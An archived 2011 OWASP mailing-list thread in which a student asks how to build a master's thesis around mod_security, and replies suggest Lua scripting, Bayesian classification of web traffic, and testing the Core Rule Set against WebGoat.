Mark, To your last comment - one of my todo research items is to use bogofilter in Lua to do Bayesian analysis. There are some interesting capabilities. We would need to be able train the classifier on "good" transactions and then maybe run different attack tools and classify them as "bad". The trick would then be to find the ideal Ham/Spam threshold for live analysis.
-- Ryan Barnett On Jan 25, 2011, at 4:51 PM, "Mark Lavi" <[email protected]<mailto:[email protected]>> wrote: >I'd rather not focus on this particular tool, but create some system that >would secure for example some specific kinds of websites. Agreed, you should be applying your thoughts to the arena of "web application security," where mod_security is your method of implementing/testing/analyzing your particular focus. >Are there any tools that help organising, applying mod security rules? Is it >needed? What could make it more research-like? Any hints please? The iterations of the CRS are a pain since they can change a bit with each release, but that is the nature of their maturity. They are hard to understand since they aren't documented in detail. You know, the webgoat project (a kind of web app honey pot at <blocked::http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project> http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project and I seem to recall another one used by Google) being protected by mod_security would be an ideal way to document (and do unit testing on) the CRS. I don't know if that is how the CRS is tested and benchmarked? I would have to say that the LUA scripting engine would be also be an ideal place to insert your value or hypothesis with or without using the CRS since mod_security is an incredible auditing tool: - test out new, hypothesized attacks and create an algorithmic or heuristic response to log/drop the attacks in LUA/custom rules/etc. - attach mod_security to a Bayesian filter (<http://en.wikipedia.org/wiki/Bayesian_filter>http://en.wikipedia.org/wiki/Bayesian_filter) and apply email like tactics to web traffic/attacks Mark Lavi Senior Web Producer sgi 46600 Landing Parkway Fremont, CA 94538 (510) 933-5234 direct <blocked::mailto:[email protected]>[email protected]<mailto:[email protected]> <blocked::http://www.sgi.com/>www.sgi.com<http://www.sgi.com> ________________________________ From: Pawel Duda [mailto:[email protected]] Sent: Friday, January 21, 2011 12:46 PM To: <mailto:[email protected]> [email protected]<mailto:[email protected]> Subject: [mod-security-users] mod_security - how to use for master thesis? Hi, I've been playing with mod_security for some time and I'd like somehow to use it in my master thesis. I don't know exactly how this work could be more interesting than describing what mod_security does, what kind of web attacks can be prevented using it, what are other functions of it (like analysing if the requests are really HTTP, analysing XML). I'd rather not focus on this particular tool, but create some system that would secure for example some specific kinds of websites. Are there any tools that help organising, applying mod security rules? Is it needed? What could make it more reaserch-like? Any hints please? _______________________________________________ Owasp-modsecurity-core-rule-set mailing list [email protected]<mailto:[email protected]> https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set _______________________________________________ Owasp-modsecurity-core-rule-set mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set
